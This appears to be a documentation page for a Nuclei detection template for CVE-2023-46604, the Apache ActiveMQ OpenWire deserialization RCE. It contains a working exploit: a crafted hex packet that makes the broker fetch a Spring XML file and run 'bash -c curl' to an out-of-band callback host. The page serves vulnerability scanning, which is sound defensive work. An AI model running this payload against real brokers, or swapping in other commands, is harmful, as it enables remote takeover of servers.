Apache ActiveMQ - Remote Code Execution
ID: CVE-2023-46604
Severity: critical
Author: Ice3man,Mzack9999,pdresearch
Tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev
Description
Section titled “Description”Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
YAML Source
Section titled “YAML Source”id: CVE-2023-46604
info: name: Apache ActiveMQ - Remote Code Execution author: Ice3man,Mzack9999,pdresearch severity: critical description: | Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue. reference: - http://www.openwall.com/lists/oss-security/2023/10/27/5 - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt - https://github.com/X1r0z/ActiveMQ-RCE - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog - https://paper.seebug.org/3058/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-46604 cwe-id: CWE-502 epss-score: 0.97273 epss-percentile: 0.99837 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: activemq shodan-query: - product:"ActiveMQ OpenWire Transport" - cpe:"cpe:2.3:a:apache:activemq" - product:"activemq openwire transport" tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kevvariables: prefix: "1f00000000000000000001010042" classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" final: "{{prefix}}{{classname}}"
javascript: - pre-condition: | isPortOpen(Host,Port); code: | let m1 = require('nuclei/net'); let m2 = require('nuclei/bytes'); let b = m2.Buffer(); let name=Host+':'+Port; let conn = m1.Open('tcp', name); let randomvar = '{{randstr}}'.toLowerCase(); var Base64={encode: btoa} exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/' packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010" packet+=(exploit_xml.length).toString(16) packet+=(b.WriteString(exploit_xml)).Hex() conn.SendHex(packet); resp = conn.RecvString() randomvar
args: Host: "{{Host}}" Port: "61616" oob: "{{interactsh-url}}"
matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(interactsh_request, response)' condition: and# digest: 4a0a004730450220015aef6147a0da147b6258f847cf88f453e15dd58e58ded3a402d32db5809baf02210089dd428cef028f5f34f6189beea2f550c0c66893aa9262338334bfb731bf0cd5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "javascript/cves/2023/CVE-2023-46604.yaml"